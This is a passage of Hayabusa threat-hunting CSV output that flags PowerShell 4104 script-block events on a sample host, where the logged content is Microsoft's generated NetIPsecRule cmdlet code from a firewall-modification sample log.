$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 
+09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) 
$__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, 
